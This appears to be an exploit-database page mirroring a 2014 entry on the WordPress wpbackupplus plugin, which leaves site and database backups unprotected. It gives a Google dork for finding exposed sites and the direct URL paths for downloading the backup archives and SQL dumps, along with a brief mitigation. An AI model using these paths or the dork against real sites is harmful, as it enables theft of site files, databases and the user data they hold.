header-logo
Suggest Exploit
vendor:
Wordpress wpbackupplus
by:
pSyCh0_3D (Arfaoui Moslem)
7,5
CVSS
HIGH
Unauthorized Access
284
CWE
Product Name: Wordpress wpbackupplus
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: win7 32 Bit & Linux Kali
2014

WordPress wpbackupplus Database and files Backup download (0-day)

wpbackupplus make the backup .zip files and not protected. For download all the website files, the attacker can use the URL http://[SITE]/[PATH]/wp-content/uploads/wp-backup-plus/. For download the Database backup, the attacker can use the URL http://[SITE]/[PATH]/wp-content/uploads/wp-backup-plus/temp. The POC is http://[SERVER]/wp-content/uploads/wp-backup-plus/temp/[DATABASE_NAME]_[DATE].sql.

Mitigation:

Ensure that the backup files are stored in a secure location and are not accessible to unauthorized users.
Source

Exploit-DB raw data:

# Exploit Title: Wordpress wpbackupplus Database and files Backup download (0-day)
# Google Dork: Index of:"/wp-backup-plus"
# Date: 19/07/2014
# Exploit Author: pSyCh0_3D (Arfaoui Moslem) https://www.facebook.com/lulz.sec
# Vendor Homepage: http://wpbackupplus.com/
# Version:
# Tested on: win7 32 Bit & Linux Kali 

[+] Description 

wpbackupplus make the backup .zip files and not protected 

[+] Exploit: 

For download all the website files 

http://[SITE]/[PATH]/wp-content/uploads/wp-backup-plus/ 

For download the Database backup 

http://[SITE]/[PATH]/wp-content/uploads/wp-backup-plus/temp 

[+]  POC : 

http://[SERVER]/wp-content/uploads/wp-backup-plus/temp/

Navigation

Suggest Exploit

Services By CQR